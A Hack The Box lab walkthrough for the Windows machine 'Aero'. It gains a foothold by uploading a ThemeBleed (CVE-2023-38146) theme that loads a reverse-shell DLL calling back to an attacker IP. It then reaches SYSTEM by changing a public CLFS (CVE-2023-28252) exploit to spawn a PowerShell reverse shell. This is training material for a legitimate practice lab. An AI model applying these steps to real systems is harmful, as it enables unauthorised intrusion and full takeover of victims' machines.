Hack The Box: Aero

Written By Alexander Commodore

What will you learn? Aero is a medium rated Windows machine featuring two recent CVEs: CVE-2023-38146 affecting Windows themes and CVE-2023-28252 affecting the Common Log File System (CLFS). We’re able to achieve initial access through a malicious payload using a Theme Bleed PoC (Proof-of-Concept) returning a reverse shell. After gaining a foothold, we’re able to escalate using CVE2023-28252 to the NT Authority\SYSTEM user.

Let’s start enumerating the box:

The following ports are found to be open: A Microsoft IIS HTTP Server version 10.0

Navigating to the website we’re able to land on a some what plain looking page. There is an upload functionality at the bottom of the page, perhaps we can test for unfiltered inputs and upload to a Microsoft IIS Server a payload to return a reverse shell or webshell.

We’re able to see what webshells exist by default on the Kali Linux operating system. The ASP and ASPX options are most helpful to us with the nature of the server, unless there is a PHP backend running which may be a secondary good thing to test for.

Looking up ‘Aero Theme Hub’ returns results on Google for a CVE-2023-38146, GitHub repository: https://github.com/Jnnshschl/CVE-2023-38146 . We can acquire these locally by using git clone https://github.com/exploits-forsale/themebleed.git and work to understand how to configure the exploit against this Windows 11 Theme hub.

We need to create our own DLL called VerifyThemeVersion containing our code. Then follow the other parameters above in the Github Repo. In order to proceed as a prerequisite make sure you install apt-get install mingw-w64. We are also going to require the windows.c reverse shell exploit in this GitHub repo: https://github.com/izenynn/c-reverse-shell/blob/main/windows.c

We are going to heavily edit the windows.c reverse shell and yours should match what this one appears like:

Then we will create the function for ThemeBleed using the required naming convention for the function VerifyThemeVersion. We are going to have the program call the ReverseShell function and specify our port and IP.

Now we are to use mingw to compile our C exploit, and create a DLL that we can serve up later to create a reverse shell connection.

Now we can start the actual theme bleed server (SMB Server) from the exploit GitHub repository, but we will need a vulnerable Windows machine without anti-virus running to host the ThemeBleed server. We are going to use this to create the server: https://github.com/exploits-forsale/themebleed/releases/tag/v1

Now we can start a Python HTTP server using python3 -m http.server 80 and host the file to the Windows machine by visiting the link in the browser or using any other LOLBAS methods.

After transporting the file we will shut down the ‘Server’ service and disable it, then restart the Windows virtual machine. This is because the exploit wants to use port 445 and that would be taken up by this service.

After rebooting we want to navigate to where our Themebleed.exe file is and create a theme pointing back to our machine. .\ThemeBleed.exe make_theme 10.10.14.8 exploit.theme

Now we need to go into the Data folder and delete stage3 and replace that with the DLL we created. Then we will rename that DLL to stage_3` instead.

After creating a theme we want to start the ThemeBleed server using .\ThemeBleed.exe server

Now we need to copy the exploit.theme file over to our Kali Linux machine.

Now we need to setup a SOCAT server to forward information to our 10.10.14.8 address because our Windows box is not listening on a 10.10.14.8 address. We will need our Virtual Machines bridged in order for this to work. So anything hitting us on 445 will be forwarded to our Windows box on port 445. Then we will have a netcat listener running port 4444 as well.

Now we can upload the theme.exploit to the target upload functionality page and we will be able to proceed in getting a connection back.

We should try to exploit until it works, it took a while for me and multiple attempts. I even tried to stop the server and starting it again too. Then the server starts releasing information and returns a reverse shell connection back to our netcat listener.

Now we have our initial foothold and you can acquire the user.txt flag

Now if we go to our user’s Documents folder we will find two artifacts. One being a CVE-2023-28252 hint and another is a Watchdog.ps1 script. We should look at the PDF using PowerShell and converting it to a base64 string.

Enter: $b64 = [Convert]::ToBase64String([IO.FILE]::ReadAllBytes("CVE-2023-28252_Summary.pdf")) and then call it using $b64. Then we can copy that text.

Then we can copy that into a file, decode it from base64 and output that into a PDF file, and we’re able to open it

Now we can work on this privilege escalation, working to find a public exploit to use: https://github.com/fortra/CVE-2023-28252 . We can copy this over using git clone https://github.com/fortra/CVE-2023-28252.git and it looks like a visual studio project so we can open it with that. We can create a tar file to better copy it over to the Windows box we were using before. We will need to use 7zip in order to extract it.

Host a Python web server to bring it over to the other Windows machine. Then install 7zip and Microsoft Visual Studio (not Microsoft Visual Studio code). Once you start MS Visual Studio turn it to ‘release’ instead of ‘debug’ in the working window for the project. We’re opening the SLN file and then going to the source files.

Use CTRL+F to find where it says system(, it would be spawning a notepad. We are going to spawn a reverse shell instead using PowerShell.

Then we can rebuild the solution. If you need build tools installed use: https://visualstudio.microsoft.com/downloads/#build-tools-for-visual-studio-2019 or you may also go to Project > Retarget Solution and it could fix your issue.

To get that file to the Linux machine, repeat the process with NETCAT or another method. Then we need to copy over a shell from /usr/share/nishang for the Invoking of a PowerShell TCP one-liner that we will name shell.ps1.

Configure the shell we’re going to host to our IP and a desired port to use with netcat.

Hosting our required resources for the attacker machine to curl what is required from our webserver.

Now we will curl the exploit over, run it, and we should receive a connection back to our netcat listener. I ended up switching my shell.ps1 payload to: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

Now we will get a connection back to our reverse shell listener as NT AUTHORITY\SYSTEM. We have successfully rooted the box

Alexander Commodore
Previous

Hack The Box: Active
Next

Hack The Box: Bucket (AWS)